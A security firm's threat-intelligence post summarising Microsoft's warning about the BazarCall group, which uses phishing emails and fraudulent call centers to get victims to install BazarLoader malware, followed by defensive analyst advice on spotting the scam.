Latest Threat Research: Technical Analysis: Killer Ultra Malware Targeting EDR Products in Ransomware Attacks

Get Informed


Microsoft Warns BazarCall Using Call Centers For Malware Distribution

Beware of phishing emails claiming your free trial subscription is over and that urge you to call a number to cancel it before you get slugged with monthly fees. Microsoft’s cybersecurity researchers are now on the hunt for BazarCall, a criminal group that’s using call centers to infect PCs with malware called BazarLoader and BazarBackdoor – a malware loader that’s been used to distribute payloads that ultimately lead to company-wide ransomware. BazarCall (or Bazacall) actors have been active since January according to Microsoft, and were notable because they used call center operators to guide victims into installing BazarLoader onto a Windows PC. Palo Alto Networks’ Brad Duncan recently detailed the group’s techniques in a blog post. As he describes, the malware provides backdoor access to an infected Windows device: “After a client is infected, criminals use this backdoor access to send follow-up malware, scan the environment and exploit other vulnerable hosts on the network,” Duncan noted. Usually, the attack starts with phishing emails advising the victim that a trial subscription has expired and that they will be automatically charged a monthly fee unless they call a number to cancel the trial. “When recipients call the number, a fraudulent call center operated by the attackers instructs them to visit a website and download an Excel file to cancel the service. The Excel file contains a malicious macro that downloads the payload,” Microsoft Security Intelligence explains.

Analyst Notes

Binary Defense threat researchers continue to study the threat posed by BazarCall and have seen evidence of the group’s operation as early as November 2020 through the present time. Employee education goes a long way toward guarding against this threat, since email filtering doesn’t catch all of them, and the email might come in via employees’ personal email accounts in addition to corporate email. As with any unsolicited phone call, it should be treated as suspicious. If someone receives a call or an email requesting a call back about a subscription ending, and that person is not familiar with said subscription, then that call is most likely some sort of scam. If a call center operator ever asks a caller to visit a website and download a file, that should be a red flag that something is not right. It is this analyst’s experience, that when canceling any subscription, that not one service has asked to have a file downloaded from any website. Any file downloads that do not come from an explicitly trusted source should be treated with extreme suspicion.


Source Artice: